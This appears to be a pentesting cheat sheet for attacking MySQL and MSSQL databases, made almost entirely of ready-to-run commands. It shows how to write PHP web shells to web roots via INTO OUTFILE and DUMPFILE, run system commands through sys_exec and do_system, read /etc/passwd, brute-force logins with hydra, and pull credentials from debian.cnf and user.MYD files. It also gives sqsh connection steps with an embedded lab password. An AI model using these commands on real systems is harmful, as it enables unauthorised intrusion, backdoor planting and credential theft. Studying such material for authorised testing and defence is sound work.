If we have MYSQL Shell via sqlmap or phpmyadmin, we can use mysql outfile/ dumpfile function to upload a shell.
Copy echo -n "<?php phpinfo(); ?>" | xxd -ps 3c3f70687020706870696e666f28293b203f3e
select 0x3c3f70687020706870696e666f28293b203f3e into outfile "/var/www/html/blogblog/wp-content/uploads/phpinfo.php"
Copy SELECT "<?php passthru($_GET['cmd']); ?>" into dumpfile '/var/www/html/shell.php';
Copy select sys_exec('/bin/bash');
bash -p or sudo su
Copy sqsh program: apt-get install sqsh freetds-bin freetds-common freetds-dev
usage:
add to the bottom of freetds.conf:
[hostname] host = 192.168.168.169
port = 2600
tds version = 8.0
edit ~/.sqshrc:
\set username=sa
\set password=password
\set style=vert
connect: sqsh -S hostname
Copy sqsh -S 10.10.10.59 -U sa -P GWE3V65#6KFH93@4GWTG2Gā If you have sql-shell from sqlmap/ phpmyadmin, we can read files by using the load_file function.
Copy select load_file('/etc/passwd');
Copy mysql-audit.nse
mysql-brute.nse
mysql-databases.nse
mysql-dump-hashes.nse
mysql-empty-password.nse
mysql-enum.nse
mysql-info.nse
mysql-query.nse
mysql-users.nse
mysql-variables.nse
mysql-vuln-cve2012-2122.nse
Copy hydra -L <USERS_LIST> -P <PASSWORDS_LIST> <IP> mysql -vV -I -u
Copy cat /etc/mysql/debian.cnf
grep -oaE "[-_\.\*a-Z0-9]{3,}" /var/lib/mysql/mysql/user.MYD | grep -v "mysql_native_password"
Copy # Local
mysql -u <USER>
mysql -u <USER> -p
# Remote
mysql -h <IP> -u <USER>
Copy show databases;
use <DATABASES>;
show tables;
describe <TABLE>;
select * from <TABLE>;
# Try to execute code
select do_system('id');
\! sh
# Read & Write
select load_file('<FILE>');
select 1,2,"<?php echo shell_exec($_GET['c']);?>",4 into OUTFILE '<OUT_FILE>'
Copy Cheatsheet :
- https://www.asafety.fr/mysql-injection-cheat-sheet/